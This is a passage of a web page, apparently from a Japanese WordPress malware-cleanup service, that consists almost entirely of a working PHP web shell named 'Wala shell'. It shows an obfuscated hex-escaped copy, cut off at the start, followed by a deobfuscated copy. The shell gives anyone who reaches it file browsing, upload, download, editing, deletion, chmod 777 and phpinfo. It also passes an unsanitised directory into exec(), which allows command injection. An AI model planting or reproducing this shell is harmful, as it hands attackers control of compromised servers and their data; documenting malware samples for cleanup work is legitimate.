x71"]}=${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x73rv\x79y\x74\x71"]}.basename($_FILES["f\x69\x6ce\x5f\x6e\x61\x6d\x65"]["\x6e\x61\x6d\x65"]);if(move_uploaded_file($_FILES["f\x69le_\x6e\x61\x6de"]["tmp\x5fna\x6d\x65"],${$kignxdnh})){setcookie("u\x70\x6c\x6fa\x64\x44\x69\x72","");echo"T\x68e \x66i\x6c\x65 ".basename($_FILES["fil\x65_\x6e\x61\x6d\x65"]["nam\x65"])." \x68\x61s \x62een up\x6c\x6fad\x65\x64";}else{echo"\x45r\x72\x6f\x72\x20c\x6f\x70\x79in\x67 f\x69l\x65,\x20\x6cikel\x79\x20a \x70\x65rmis\x73i\x6f\x6e\x20\x65rror.";}}}else{echo "\x20\n \x20 \x20\x20 <f\x6f\x72\x6d\x20\x74arg\x65\x74\x3d\x22_bl\x61\x6ek\" \x61\x63\x74i\x6fn\x3d\"\"\x20m\x65\x74h\x6f\x64=\"\x47E\x54\x22> \n\x20\x20 \x20\x20 \x20\x20 \x20\x20<\x69\x6e\x70ut t\x79pe\x3d\"hid\x64\x65n\x22\x20na\x6d\x65\x3d\"cc\"\x20v\x61\x6cue\x3d\"\x31\" />\x20\n\x20\x20\x20\x20 \x20 \x50\x65\x6e\x63\x65t \x6b\x75\x6e\x63i se\x62\x65\x6cu\x6d uplo\x61\x64\x20:\x3c\x62r /\x3e \n \x20 \x20 \x20 \x4co\x6ba\x73i\x20U\x70l\x6f\x61d: <in\x70\x75\x74 ty\x70\x65=\"te\x78t\"\x20\x6ea\x6d\x65=\x22\x64\x69r\x22 \x76\x61\x6cue\x3d\"";echo$_REQUEST["d\x69\x72"];echo "\x22>\x3cbr\x20/>\x20\n \x20\x20 \x20 \x20 \x3ci\x6ep\x75\x74 \x74y\x70e=\"s\x75\x62\x6di\x74\x22\x20v\x61\x6cue=\"kunci\" /> \n\x20\x20\x20 \x20 \x20 </\x66\x6f\x72\x6d\x3e\x20\n\x20\x20\x20\x20\x20\x20\x20 <\x62r /\x3e\x3cbr /> \n \x20\x20 \x20\x20\x20\n\x20 \x20\x20 \x20\x20 \x3cf\x6frm en\x63t\x79\x70e=\"\x6dult\x69p\x61rt/\x66o\x72m-\x64at\x61\x22 a\x63\x74\x69o\x6e=\x22\"\x20\x6detho\x64=\x22\x70\x6fst\x22\x3e\x20\n \x20 \x20 Up\x6c\x6f\x61\x64 \x66\x69le:<\x69\x6e\x70ut\x20n\x61\x6de=\x22f\x69le\x5fn\x61m\x65\" ty\x70e\x3d\x22\x66\x69\x6ce\"> \x3c\x69\x6ep\x75t \x74yp\x65=\x22s\x75\x62mit\x22\x20v\x61\x6cu\x65\x3d\"\x55\x70\x6coad\x22\x20/>\x3c/f\x6frm> \n\n\x20 \x20 \x20\x20 ";}}elseif(isset($_REQUEST["\x63c"])){setcookie("u\x70l\x6fa\x64\x44ir",$_GET["dir"]);echo"jozz, j\x61n\x67an \x61p\x6cot\x20d\x69\x20\x64i\x72\x20\x6c\x61\x69\x6e\x20se\x6ca\x69\x6e \x79g\x20d\x69\x20\x6bun\x63\x69\x20ta\x64\x69.";}elseif(isset($_REQUEST["df"])){$fmnwdqnh="s\x6c\x61\x73\x68";$_REQUEST["d\x66"].=${$fmnwdqnh}.$_REQUEST["fil\x65"];if(@unlink($_REQUEST["df"])){echo"\x46\x69l\x65\x20d\x65\x6ce\x74ed";}else{echo"E\x72ror dele\x74in\x67 \x66\x69\x6ce";}}elseif(isset($_REQUEST["\x65f"])){echo "\x20\n<\x73\x63\x72ipt\x20t\x79\x70\x65=\"t\x65\x78\x74/\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\"\x3e\x20\n\x20\x20\x3c\x21--\x20\n\n\x20 \x76\x61r ke\x79\x20=\x20\"AB\x43D\x45FG\x48I\x4a\x4b\x4c\x4dN\x4fPQR\x53T\x55\x56W\x58\x59Z\x61bc\x64e\x66ghi\x6a\x6b\x6cmnop\x71\x72\x73tuv\x77\x78y\x7a01\x3234\x356789+/=\"\x3b \n\n fun\x63t\x69o\x6e\x20enc\x6fd\x65\x36\x34(\x69n\x70S\x74\x72) \n\x20 {\x20\n \x20\x20i\x6e\x70\x53tr \x3d \x65\x73cape(\x69n\x70S\x74\x72)\x3b \n \x20 \x76\x61r\x20o\x75tpu\x74 = \"\"\x3b \n \x20 \x20 var \x63\x68r1, ch\x72\x32, ch\x723\x20= \"\x22; \n \x20 \x20\x20v\x61\x72\x20e\x6e\x631, e\x6ec\x32, \x65\x6ec\x33,\x20e\x6e\x63\x34\x20=\x20\"\x22; \n\x20\x20 \x20v\x61r i \x3d\x20\x30; \n\n\x20\x20 \x64o\x20{ \n \x20\x20\x20 \x20chr\x31\x20\x3d inp\x53\x74r.cha\x72\x43od\x65At(\x69++)\x3b \n \x20\x20 \x20\x20 \x63\x68\x722\x20\x3d inp\x53tr.\x63harCodeAt(i++); \n\x20 c\x68r\x33 \x3d \x69np\x53\x74\x72.\x63\x68ar\x43\x6fde\x41\x74(i++)\x3b\x20\n\n\x20 \x20 \x20 \x65n\x631\x20\x3d c\x68\x721\x20\x3e> \x32\x3b\x20\n \x20\x20 \x20 \x20 \x65\x6e\x632 =\x20((\x63h\x721 & \x33) <\x3c\x204)\x20|\x20(\x63hr2\x20>> \x34)\x3b\x20\n\x20 \x20\x20 \x20\x20 en\x63\x33\x20=\x20((\x63hr\x32\x20\x26 15)\x20<\x3c\x20\x32) | (chr\x33 >\x3e 6); \n\x20\x20\x20\x20\x20\x20 enc\x34\x20\x3d \x63\x68r\x33 & 6\x33\x3b \n\n \x20\x20 \x20\x20\x20if (\x69\x73Na\x4e(chr\x32)) \n \x20\x20\x20\x20 \x20{ \n \x20\x20\x20\x20 \x20 enc\x33\x20\x3d\x20e\x6ec\x34 \x3d\x2064;\x20\n\x20 \x20\x20 \x20} \x20\n\x20\x20 \x20\x20\x20 \x20\x65l\x73e\x20i\x66\x20(\x69\x73Na\x4e(ch\x723))\x20\x20\n\x20\x20 \x20\x20\x20 \x20{\x20\n\x20 \x20 \x20\x20 \x20 \x20 enc\x34 =\x20\x364\x3b \n \x20 \x20\x20} \n\n \x20 \x20\x20\x20 \x20o\x75t\x70\x75\x74\x20\x3d\x20ou\x74p\x75\x74\x20+ \n \x20\x20\x20\x20 k\x65y.char\x41\x74(e\x6e\x63\x31)\x20+ \n\x20 \x20\x20 \x20 \x20\x20\x6be\x79\x2ech\x61\x72\x41\x74(e\x6ec\x32) + \n \x20\x20\x20 \x20 ke\x79.\x63h\x61rAt(\x65nc3) +\x20\n\x20\x20\x20 \x20\x20\x20 \x20 \x6b\x65y\x2e\x63ha\x72At(\x65\x6ec\x34); \n \x20\x20\x20 \x20 \x20c\x68r1\x20\x3d c\x68\x72\x32 =\x20\x63h\x723\x20\x3d \x65\x6ec1\x20=\x20e\x6ec\x32 = \x65\x6e\x633\x20\x3d\x20\x65nc\x34\x20\x3d\x20\"\";\x20\n \x20\x20\x20}\x20\x77hile\x20(\x69 < \x69\x6ep\x53t\x72.\x6c\x65\x6eg\x74\x68)\x3b \n\n\x20\x20 \x20\x20ret\x75rn \x6fu\x74\x70u\x74; \n\x20\x20}\x20\n\n \x20//-->\x3c/scr\x69\x70\x74>\x20\n\n \x20";$_REQUEST["e\x66"].=$_REQUEST["\x66\x69\x6ce"];if(isset($_POST["n\x65\x77\x63\x6f\x6et\x65\x6e\x74"])){$_POST["newc\x6fnt\x65\x6e\x74"]=urldecode(base64_decode($_POST["\x6e\x65wco\x6ete\x6e\x74"]));${${"\x47L\x4fB\x41\x4c\x53"}["\x61\x65q\x74uu"]}=@fopen($_REQUEST["ef"],"\x77");if(${${"G\x4c\x4fB\x41L\x53"}["ae\x71\x74\x75u"]}){$vdpwpoyvf="\x73\x74re\x61m";fwrite(${$vdpwpoyvf},$_POST["ne\x77co\x6e\x74\x65n\x74"]);echo"\x57r\x69te\x20su\x63\x65\x73\x73\x66ul";}else{echo"C\x6f\x75\x6c\x64 n\x6ft w\x72\x69\x74\x65\x20to file";}fclose(${${"\x47LO\x42AL\x53"}["aeqtuu"]});}echo " \n\x20 <f\x6frm a\x63\x74ion\x3d\x22\" \x6eam\x65=\"f\x22\x20m\x65\x74\x68o\x64\x3d\"PO\x53\x54\x22> \n \x20 \x3c\x74e\x78\x74\x61r\x65\x61 \x77r\x61p\x3d\x22\x6f\x66\x66\"\x20r\x6fws=\"\x340\"\x20col\x73=\x221\x330\"\x20name=\x22\x6ee\x77\x63\x6f\x6e\x74en\x74\x22>";echo file_get_contents($_REQUEST["ef"]);echo "</\x74exta\x72\x65a\x3e\x3c\x62\x72\x20/>\x20\n\x20 <\x69n\x70u\x74 \x74y\x70e=\x22s\x75b\x6d\x69\x74\" \x76\x61\x6cue=\x22\x49 \x62\x61\x73e6\x34 \x65\x6ecoded\x20\x69\x74\x20my\x73\x65lf,\x20\x64\x6fn\x74\x20\x72\x75\x6e s\x63ri\x70t\" />\x3cbr /\x3e \n <inp\x75t\x20\x74\x79\x70e=\"sub\x6dit\" val\x75e=\x22\x43h\x61nge (\x72\x65qu\x69res\x20j\x61va\x73cri\x70t \x74o \x77\x6fr\x6b)\x22\x20 \x6fnc\x6cic\x6b=\x22\x64o\x63\x75\x6de\x6e\x74\x2ef\x2en\x65\x77co\x6e\x74\x65n\x74\x2e\x76a\x6c\x75\x65=en\x63\x6f\x64\x656\x34(d\x6fc\x75\x6d\x65\x6e\x74\x2ef.n\x65w\x63o\x6e\x74\x65n\x74.v\x61\x6c\x75\x65);\x22\x20/\x3e\n \x20\x20\x20\x3c/\x66\x6f\x72\x6d>\x20\n\x20 \x20 ";}else{echo "\x20\n\x3c\x62>\x53e\x72\x76e\x72 \x49\x6e\x66\x6frm\x61\x74io\x6e:</b><\x62\x72\x20/\x3e \n\x3c\x69\x3e \nOp\x65\x72\x61t\x69\x6eg\x20Sy\x73\x74e\x6d:\x20";echo PHP_OS;echo "<b\x72\x20/> \nP\x48P Ve\x72si\x6fn:\x20";echo PHP_VERSION;echo "\x3c\x62r\x20/\x3e \n<a\x20h\x72\x65f\x3d\x22?\x70\x68p\x69\x6efo\x3dt\x72\x75e\">Vi\x65\x77 \x70hpi\x6e\x66o</a>\x20\n</i> \n\x3c\x62r\x20/\x3e \n\x3cb\x72 /> \n\x3c\x62\x3e\x44\x69\x72\x65c\x74o\x72\x79 \x54rave\x72sal</b><br /> \n<\x62\x3e";echo getcwd();echo "</b><\x62r /\x3e\x3c\x62\x72\x20/\x3e\x20\n<\x61 h\x72\x65\x66=\x22?\x64\x3d";echo getcwd();echo "\"\x3e<b\x3e\x47o \x74o \x63u\x72\x72\x65n\x74\x20\x77\x6f\x72\x6b\x69\x6e\x67 di\x72ecto\x72\x79</\x62></a>\x20<br\x20/\x3e \n\x3ca hr\x65f\x3d\"?\x64=";echo${${"\x47L\x4fB\x41L\x53"}["\x6e\x7aof\x7adz"]};echo "\"\x3e<b\x3eG\x6f\x20\x74o\x20r\x6fot\x20\x64\x69\x72ecto\x72y\x3c/b\x3e\x3c/\x61> \x3c\x62\x72 /> \n<b>Go\x20to \x61n\x79 d\x69r\x65\x63to\x72\x79:\x3c/b> <\x66o\x72m\x20a\x63t\x69\x6f\x6e=\"\x22 me\x74ho\x64\x3d\"GET\"\x3e<\x69npu\x74 \x74yp\x65=\"\x74\x65\x78\x74\x22\x20nam\x65\x3d\"\x64\x22 \x76\x61lu\x65=\"";echo${${"\x47L\x4fB\x41\x4c\x53"}["\x6ezof\x7ad\x7a"]};echo "\x22 /><\x69\x6epu\x74\x20\x74y\x70\x65=\"\x73\x75\x62\x6d\x69t\x22\x20\x76a\x6c\x75\x65\x3d\x22Go\x22\x20/></f\x6frm\x3e \n\n\n\n";}
?><?php
$GLOBALS["aeqtuu"] = "stream";
$GLOBALS["srvyytq"] = "target_path";
$GLOBALS["iceigf"] = "fileList";
$GLOBALS["tfiyore"] = "contents";
$GLOBALS["pdwkggh"] = "dirList";
$GLOBALS["bruygedogx"] = "dir";
$GLOBALS["tuppemikyy"] = "d";
$GLOBALS["fjmaoprxtcwv"] = "conString";
$GLOBALS["ctjuhy"] = "handle";
$GLOBALS["gampmrwdr"] = "file";
$GLOBALS["lxzupxpcv"] = "filename";
$GLOBALS["bhlsnxwggsr"] = "output";
$GLOBALS["hbjlxr"] = "archive";
$GLOBALS["venpja"] = "dirParts";
$GLOBALS["hjuhkbw"] = "directory";
$GLOBALS["rjwrmfybksb"] = "fixedPath";
$GLOBALS["wjmspf"] = "firstPiece";
$GLOBALS["zeofoqtzpsbj"] = "lastKey";
$GLOBALS["sqoxjbwfvkjs"] = "val";
$GLOBALS["pvlxipzbvdcd"] = "key";
$GLOBALS["qivsejyqkmkv"] = "parts";
$GLOBALS["crfiid"] = "path";
$GLOBALS["egrnrognml"] = "slash";
$GLOBALS["nzofzdz"] = "rootDir";
$GLOBALS["thjjynvrox"] = "isLinux";
$GLOBALS["lplkcsopryo"] = "cwd";
$GLOBALS["bclgetnride"] = "driveLetter";
$nmsircz = "slash";
$GLOBALS["stspkupxfk"] = "cwd";
echo "<html xmlns=\"http://www.w3.org/1999/xhtml\">\n<head>\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" />\n<title>Wala shell</title>\n</head><center>\n \n</html>\n\n";
$mbtmczex = "isLinux";
$mpayixqygf = "isLinux";
function isLinux($path)
{
$GLOBALS["wmxnowh"] = "path";
return substr($path, 0, 1) == "/" ? true : false;
}
function getSlashDir($isLinux)
{
$GLOBALS["yjwmxdwhge"] = "isLinux";
return $isLinux ? "/" : "\\";
}
$cwd = getcwd();
$oxkdkgswe = "slash";
$isLinux = isLinux($cwd);
if (!$isLinux) {
$jydnvsbmck = "cwd";
$driveLetter = substr($cwd, 0, 1);
}
$GLOBALS["zcgrojd"] = "slash";
$GLOBALS["kldmjue"] = "parts";
${$nmsircz} = getSlashDir(${$GLOBALS["thjjynvrox"]});
${$GLOBALS["kldmjue"]} = explode(${$oxkdkgswe}, ${$GLOBALS["lplkcsopryo"]});
${$GLOBALS["nzofzdz"]} = ${$GLOBALS["thjjynvrox"]} ? ${$GLOBALS["zcgrojd"]} : ${$GLOBALS["bclgetnride"]} . ":" . ${$GLOBALS["egrnrognml"]};
function cleanPath($path, $isLinux)
{
$GLOBALS["wbvsclu"] = "parts";
$rvtodmzazvn = "val";
$uybbqkvjk = "slash";
$GLOBALS["uhoappveuod"] = "parts";
$esfdjlqekqv = "isLinux";
$slash = getSlashDir(${$GLOBALS["thjjynvrox"]});
$parts = explode(${$GLOBALS["egrnrognml"]}, ${$GLOBALS["crfiid"]});
foreach (${$GLOBALS["qivsejyqkmkv"]} as ${$GLOBALS["pvlxipzbvdcd"]} => $val) {
$GLOBALS["etllnkpqt"] = "val";
if (${$GLOBALS["sqoxjbwfvkjs"]} == "..") {
$GLOBALS["mtirilgpym"] = "parts";
$jycsygdpkne = "lastKey";
$parts[${$GLOBALS["pvlxipzbvdcd"]}] = "";
$lastKey = ${$GLOBALS["pvlxipzbvdcd"]} - 1;
${$GLOBALS["qivsejyqkmkv"]}[${$GLOBALS["zeofoqtzpsbj"]}] = "";
} elseif ($val == ".") {
$qcpqxbuwf = "key";
$GLOBALS["ucswqdw"] = "parts";
$parts[$key] = "";
}
}
$grobatfhj = "firstPiece";
$GLOBALS["nrkuoovo"] = "fixedPath";
reset($parts);
$fixedPath = ${$esfdjlqekqv} ? "/" : "";
$GLOBALS["qeuyptj"] = "val";
$GLOBALS["qyvrmtnkhq"] = "fixedPath";
$GLOBALS["pxmmsntft"] = "slash";
$firstPiece = true;
foreach (${$GLOBALS["qivsejyqkmkv"]} as $val) {
if (${$GLOBALS["sqoxjbwfvkjs"]} != "") {
$GLOBALS["valkjtltnh"] = "firstPiece";
$vvpshinup = "slash";
$onjwbuswr = "fixedPath";
$fixedPath .= ($firstPiece ? "" : $slash) . ${$GLOBALS["sqoxjbwfvkjs"]};
${$GLOBALS["wjmspf"]} = false;
}
}
if (${$GLOBALS["rjwrmfybksb"]} == "") {
$jccbdm = "slash";
$GLOBALS["nhwgbseb"] = "slash";
$GLOBALS["ujxxha"] = "driveLetter";
$qpmxlsuz = "isLinux";
${$GLOBALS["rjwrmfybksb"]} = $isLinux ? $slash : $driveLetter . ":" . $slash;
}
if (substr(${$GLOBALS["rjwrmfybksb"]}, 1) != $slash) {
${$GLOBALS["rjwrmfybksb"]} .= ${$GLOBALS["egrnrognml"]};
}
return $fixedPath;
}
if (isset($_REQUEST["chm"])) {
$GLOBALS["wdcunrilozyz"] = "isLinux";
if (!$isLinux) {
echo "This feature only works on Linux";
} else {
echo @chmod($_REQUEST["chm"], 0777) ? "Reassigned" : "Can't Reasign";
}
} elseif (isset($_REQUEST["phpinfo"])) {
phpinfo();
} elseif (isset($_REQUEST["dl"])) {
if (@fopen($_REQUEST["dl"] . $_REQUEST["file"], "r") == true) {
$edbftmvcl = "slash";
$sotdkqgxy = "fileArr";
$_REQUEST["dl"] .= $_REQUEST["file"];
if (substr($_REQUEST["dl"], 0, 1) == $slash) {
$fileArr = explode(${$GLOBALS["egrnrognml"]}, $_REQUEST["dl"]);
}
header("Content-disposition: attachment; filename=" . $_REQUEST["file"]);
header("Content-type: application/octet-stream");
readfile($_REQUEST["dl"]);
} else {
echo $_REQUEST["dl"];
}
} elseif (isset($_REQUEST["gz"])) {
if (!${$GLOBALS["thjjynvrox"]}) {
echo "This feature only works on Linux";
} else {
$GLOBALS["wimvwydqtas"] = "directory";
$directory = $_REQUEST["gz"];
$GLOBALS["wblgcfkxzsmu"] = "fname";
$gcctqyegmx = "slash";
$GLOBALS["iiyplwtew"] = "directory";
$GLOBALS["pvjtndw"] = "directory";
if (substr(${$GLOBALS["hjuhkbw"]}, 1) == "/") {
$directory = substr(${$GLOBALS["hjuhkbw"]}, 0, 1);
}
${$GLOBALS["venpja"]} = explode(${$gcctqyegmx}, ${$GLOBALS["iiyplwtew"]});
${$GLOBALS["wblgcfkxzsmu"]} = ${$GLOBALS["venpja"]}[sizeof(${$GLOBALS["venpja"]}) - 1];
${$GLOBALS["hbjlxr"]} = time();
$GLOBALS["wwqghxsq"] = "archive";
exec("cd {$directory}; tar czf {$archive} *");
$xfvphtvcgazf = "output";
$GLOBALS["rdsitejg"] = "directory";
$output = @file_get_contents(${$GLOBALS["hjuhkbw"]} . "/" . ${$GLOBALS["hbjlxr"]});
if (!${$GLOBALS["bhlsnxwggsr"]}) {
header("Content-disposition: attachment; filename=ACCESS_PROBLEM");
} else {
$uefkgqk = "output";
header("Content-disposition: attachment; filename={$fname}.tgz");
echo $output;
}
header("Content-type: application/octet-stream");
@unlink(${$GLOBALS["rdsitejg"]} . "/" . ${$GLOBALS["wwqghxsq"]});
}
} elseif (isset($_REQUEST["f"])) {
$mlsnoxbx = "file";
${$GLOBALS["lxzupxpcv"]} = $_REQUEST["f"];
${$GLOBALS["gampmrwdr"]} = fopen("{$filename}", "rb");
header("Content-Type: text/plain");
fpassthru(${$mlsnoxbx});
} elseif (isset($_REQUEST["d"])) {
$GLOBALS["cyvkjstu"] = "d";
$d = $_REQUEST["d"];
echo "<pre>";
if (${$GLOBALS["ctjuhy"]} = opendir("{$d}")) {
$GLOBALS["srdvwpgcq"] = "fileList";
echo "<h2>Lokasi : ";
$nyufbdibp = "isLinux";
${$GLOBALS["fjmaoprxtcwv"]} = "";
$eykhqnuhudil = "dirList";
$qcnrlilvhx = "isLinux";
if ($isLinux) {
echo "<a href='?d={$slash}'>{$slash}</a>";
}
foreach (explode(${$GLOBALS["egrnrognml"]}, cleanPath(${$GLOBALS["tuppemikyy"]}, ${$GLOBALS["thjjynvrox"]})) as ${$GLOBALS["sqoxjbwfvkjs"]}) {
$GLOBALS["sdwewvmo"] = "slash";
$dsgjitgrlgeh = "slash";
${$GLOBALS["fjmaoprxtcwv"]} .= ${$GLOBALS["sqoxjbwfvkjs"]} . $slash;
echo "<a href='?d={$conString}'>" . ${$GLOBALS["sqoxjbwfvkjs"]} . "</a>" . (${$GLOBALS["sqoxjbwfvkjs"]} != "" ? ${$GLOBALS["sdwewvmo"]} : "");
}
$mdjrskhod = "dir";
$imnhtso = "isLinux";
echo " (<a target='_blank' href='?uploadForm=1&dir=" . urlencode(cleanPath(${$GLOBALS["tuppemikyy"]}, ${$GLOBALS["thjjynvrox"]})) . "'>upload file</a>) (<a href='?d=" . urlencode(cleanPath(${$GLOBALS["tuppemikyy"]}, ${$GLOBALS["thjjynvrox"]})) . "&hldb=1'>DB interaction files in red</a>)</h2> (<a target='_blank' href='?gz=" . urlencode(cleanPath(${$GLOBALS["tuppemikyy"]}, $isLinux)) . "'>gzip & download folder</a>) (<a target='_blank' href='?chm=" . urlencode(cleanPath(${$GLOBALS["tuppemikyy"]}, ${$nyufbdibp})) . "'>chmod folder to 777)</a> <br />";
while (${$mdjrskhod} = readdir(${$GLOBALS["ctjuhy"]})) {
if (is_dir("{$d}{$slash}{$dir}")) {
if (${$GLOBALS["bruygedogx"]} != "." && ${$GLOBALS["bruygedogx"]} != "..") {
${$GLOBALS["pdwkggh"]}[] = ${$GLOBALS["bruygedogx"]};
}
} else {
if (isset($_REQUEST["hldb"])) {
$GLOBALS["etmimeshwoj"] = "contents";
${$GLOBALS["tfiyore"]} = file_get_contents("{$d}{$slash}{$dir}");
if (stripos(${$GLOBALS["etmimeshwoj"]}, "mysql_") || stripos(${$GLOBALS["tfiyore"]}, "mysqli_") || stripos(${$GLOBALS["tfiyore"]}, "SELECT ")) {
$GLOBALS["adlejmtrzt"] = "fileList";
$fileList[] = array("dir" => ${$GLOBALS["bruygedogx"]}, "color" => "red");
} else {
$GLOBALS["qoztkushmhs"] = "fileList";
$fileList[] = array("dir" => ${$GLOBALS["bruygedogx"]}, "color" => "black");
}
} else {
$slchbr = "dir";
${$GLOBALS["iceigf"]}[] = array("dir" => $dir, "color" => "black");
}
}
}
echo "<a href='?d={$d}{$slash}.'><font color=grey>.\n</font></a>";
echo "<a href='?d={$d}{$slash}..'><font color=grey>..\n</font></a>";
if (isset(${$eykhqnuhudil})) {
$GLOBALS["qyvbvvx"] = "dirList";
if (is_array($dirList)) {
foreach (${$GLOBALS["pdwkggh"]} as ${$GLOBALS["bruygedogx"]}) {
echo "<a href='?d={$d}{$slash}{$dir}'><font color=grey>{$dir}\n</font></a>";
}
}
}
if (isset(${$GLOBALS["srdvwpgcq"]})) {
$euhpascf = "fileList";
if (is_array($fileList)) {
$GLOBALS["nhgrytscr"] = "dir";
foreach (${$GLOBALS["iceigf"]} as $dir) {
$GLOBALS["qibtih"] = "dir";
$GLOBALS["opdicofsw"] = "d";
$oucbtemsdcgn = "isLinux";
echo "<a href='?f={$d}" . ${$GLOBALS["egrnrognml"]} . ${$GLOBALS["bruygedogx"]}["dir"] . "'><font color=" . ${$GLOBALS["bruygedogx"]}["color"] . ">" . $dir["dir"] . "</font></a>" . "|<a href='?dl=" . cleanPath(${$GLOBALS["tuppemikyy"]}, $isLinux) . "&file=" . ${$GLOBALS["bruygedogx"]}["dir"] . "' target='_blank'>Download</a>|" . "|<a href='?ef=" . cleanPath($d, ${$GLOBALS["thjjynvrox"]}) . "&file=" . ${$GLOBALS["bruygedogx"]}["dir"] . "' target='_blank'>Edit</a>|" . "|<a href='?df=" . cleanPath(${$GLOBALS["tuppemikyy"]}, ${$GLOBALS["thjjynvrox"]}) . "&file=" . ${$GLOBALS["bruygedogx"]}["dir"] . "' target='_blank'>Delete</a>| \n";
}
}
}
} else {
echo "opendir() failed";
}
closedir(${$GLOBALS["ctjuhy"]});
} elseif (isset($_REQUEST["uploadForm"]) || isset($_FILES["file_name"])) {
if (isset($_FILES["file_name"])) {
if ($_FILES["file_name"]["error"] > 0) {
echo "Error";
} else {
$dowxjrxgbp = "target_path";
$kignxdnh = "target_path";
${$GLOBALS["srvyytq"]} = $_COOKIE["uploadDir"];
if (substr(${$dowxjrxgbp}, 1) != "/") {
${$GLOBALS["srvyytq"]} .= "/";
}
${$GLOBALS["srvyytq"]} .= basename($_FILES["file_name"]["name"]);
if (move_uploaded_file($_FILES["file_name"]["tmp_name"], ${$kignxdnh})) {
setcookie("uploadDir", "");
echo "The file " . basename($_FILES["file_name"]["name"]) . " has been uploaded";
} else {
echo "Error copying file, likely a permission error.";
}
}
} else {
echo " \n <form target=\"_blank\" action=\"\" method=\"GET\"> \n <input type=\"hidden\" name=\"cc\" value=\"1\" /> \n Pencet kunci sebelum upload :<br /> \n Lokasi Upload: <input type=\"text\" name=\"dir\" value=\"";
echo $_REQUEST["dir"];
echo "\"><br /> \n <input type=\"submit\" value=\"kunci\" /> \n </form> \n <br /><br /> \n \n <form enctype=\"multipart/form-data\" action=\"\" method=\"post\"> \n Upload file:<input name=\"file_name\" type=\"file\"> <input type=\"submit\" value=\"Upload\" /></form> \n\n ";
}
} elseif (isset($_REQUEST["cc"])) {
setcookie("uploadDir", $_GET["dir"]);
echo "jozz, jangan aplot di dir lain selain yg di kunci tadi.";
} elseif (isset($_REQUEST["df"])) {
$fmnwdqnh = "slash";
$_REQUEST["df"] .= $slash . $_REQUEST["file"];
if (@unlink($_REQUEST["df"])) {
echo "File deleted";
} else {
echo "Error deleting file";
}
} elseif (isset($_REQUEST["ef"])) {
echo " \n<script type=\"text/javascript\"> \n <!-- \n\n var key = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=\"; \n\n function encode64(inpStr) \n { \n inpStr = escape(inpStr); \n var output = \"\"; \n var chr1, chr2, chr3 = \"\"; \n var enc1, enc2, enc3, enc4 = \"\"; \n var i = 0; \n\n do { \n chr1 = inpStr.charCodeAt(i++); \n chr2 = inpStr.charCodeAt(i++); \n chr3 = inpStr.charCodeAt(i++); \n\n enc1 = chr1 >> 2; \n enc2 = ((chr1 & 3) << 4) | (chr2 >> 4); \n enc3 = ((chr2 & 15) << 2) | (chr3 >> 6); \n enc4 = chr3 & 63; \n\n if (isNaN(chr2)) \n { \n enc3 = enc4 = 64; \n } \n else if (isNaN(chr3)) \n { \n enc4 = 64; \n } \n\n output = output + \n key.charAt(enc1) + \n key.charAt(enc2) + \n key.charAt(enc3) + \n key.charAt(enc4); \n chr1 = chr2 = chr3 = enc1 = enc2 = enc3 = enc4 = \"\"; \n } while (i < inpStr.length); \n\n return output; \n } \n\n //--></script> \n\n ";
$_REQUEST["ef"] .= $_REQUEST["file"];
if (isset($_POST["newcontent"])) {
$_POST["newcontent"] = urldecode(base64_decode($_POST["newcontent"]));
${$GLOBALS["aeqtuu"]} = @fopen($_REQUEST["ef"], "w");
if (${$GLOBALS["aeqtuu"]}) {
$vdpwpoyvf = "stream";
fwrite($stream, $_POST["newcontent"]);
echo "Write sucessful";
} else {
echo "Could not write to file";
}
fclose(${$GLOBALS["aeqtuu"]});
}
echo " \n <form action=\"\" name=\"f\" method=\"POST\"> \n <textarea wrap=\"off\" rows=\"40\" cols=\"130\" name=\"newcontent\">";
echo file_get_contents($_REQUEST["ef"]);
echo "</textarea><br /> \n <input type=\"submit\" value=\"I base64 encoded it myself, dont run script\" /><br /> \n <input type=\"submit\" value=\"Change (requires javascript to work)\" onclick=\"document.f.newcontent.value=encode64(document.f.newcontent.value);\" />\n </form> \n ";
} else {
echo " \n<b>Server Information:</b><br /> \n<i> \nOperating System: ";
echo PHP_OS;
echo "<br /> \nPHP Version: ";
echo PHP_VERSION;
echo "<br /> \n<a href=\"?phpinfo=true\">View phpinfo</a> \n</i> \n<br /> \n<br /> \n<b>Directory Traversal</b><br /> \n<b>";
echo getcwd();
echo "</b><br /><br /> \n<a href=\"?d=";
echo getcwd();
echo "\"><b>Go to current working directory</b></a> <br /> \n<a href=\"?d=";
echo ${$GLOBALS["nzofzdz"]};
echo "\"><b>Go to root directory</b></a> <br /> \n<b>Go to any directory:</b> <form action=\"\" method=\"GET\"><input type=\"text\" name=\"d\" value=\"";
echo ${$GLOBALS["nzofzdz"]};
echo "\" /><input type=\"submit\" value=\"Go\" /></form> \n\n\n\n";
}■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]
■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります
(C)2019 ワードプレス ドクター All rights reserved.